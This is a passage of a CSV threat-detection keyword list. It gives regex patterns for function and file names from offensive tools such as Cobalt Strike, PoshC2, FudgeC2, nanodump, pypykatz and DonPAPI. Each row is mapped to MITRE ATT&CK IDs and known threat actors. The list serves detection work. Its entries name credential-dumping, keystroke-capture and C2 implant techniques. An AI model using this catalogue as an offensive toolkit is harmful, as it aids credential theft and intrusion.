TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","45627" "*get_csexecsvc_net45*",".{0,1000}get_csexecsvc_net45.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","45628" "*get_dns_dnsidle*",".{0,1000}get_dns_dnsidle.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda 
- NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45629" "*get_dns_sleep*",".{0,1000}get_dns_sleep.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45630" "*get_dpapi_masterkeys(*",".{0,1000}get_dpapi_masterkeys\(.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#content","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","45631" "*Get_DPAPI_Protected_Files*",".{0,1000}Get_DPAPI_Protected_Files.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","45632" "*get_filezilla_creds.rb*",".{0,1000}get_filezilla_creds\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45633" "*get_hijackeable_dllname*",".{0,1000}get_hijackeable_dllname.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","45634" "*get_implants_all*",".{0,1000}get_implants_all.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45635" "*get_injection_techniques*",".{0,1000}get_injection_techniques.{0,1000}","offensive_tool_keyword","mythic","A .NET 
Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","45636" "*get_keystrokes.py*",".{0,1000}get_keystrokes\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","45637" "*get_list_of_implant_text*",".{0,1000}get_list_of_implant_text.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45638" "*get_masterkeys_from_lsass*",".{0,1000}get_masterkeys_from_lsass.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","45639" "*get_newimplanturl*",".{0,1000}get_newimplanturl.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red 
teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45640" "*get_obfucation_string_dict*",".{0,1000}get_obfucation_string_dict.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45641" "*get_password_policy.x64.*",".{0,1000}get_password_policy\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","45642" "*get_password_policy.x86.*",".{0,1000}get_password_policy\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol 
- Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","45643" "*get_post_ex_pipename_list*",".{0,1000}get_post_ex_pipename_list.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45644" "*get_post_ex_spawnto_x*",".{0,1000}get_post_ex_spawnto_x.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45645" "*get_powershell_implant_stager(*",".{0,1000}get_powershell_implant_stager\(.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45646" "*get_powershell_obf_strings(*",".{0,1000}get_powershell_obf_strings\(.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45647" "*get_process_inject_allocator*",".{0,1000}get_process_inject_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - 
Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45648" "*get_process_inject_bof_allocator*",".{0,1000}get_process_inject_bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45649" "*get_process_inject_execute*",".{0,1000}get_process_inject_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - 
Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45650" "*get_rooot.c*",".{0,1000}get_rooot\.c.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","N/A","3","204","39","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z","45651" "*get_sharpurls*",".{0,1000}get_sharpurls.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45652" "*get_stage_allocator*",".{0,1000}get_stage_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45653" "*get_stage_magic_mz_64*",".{0,1000}get_stage_magic_mz_64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - 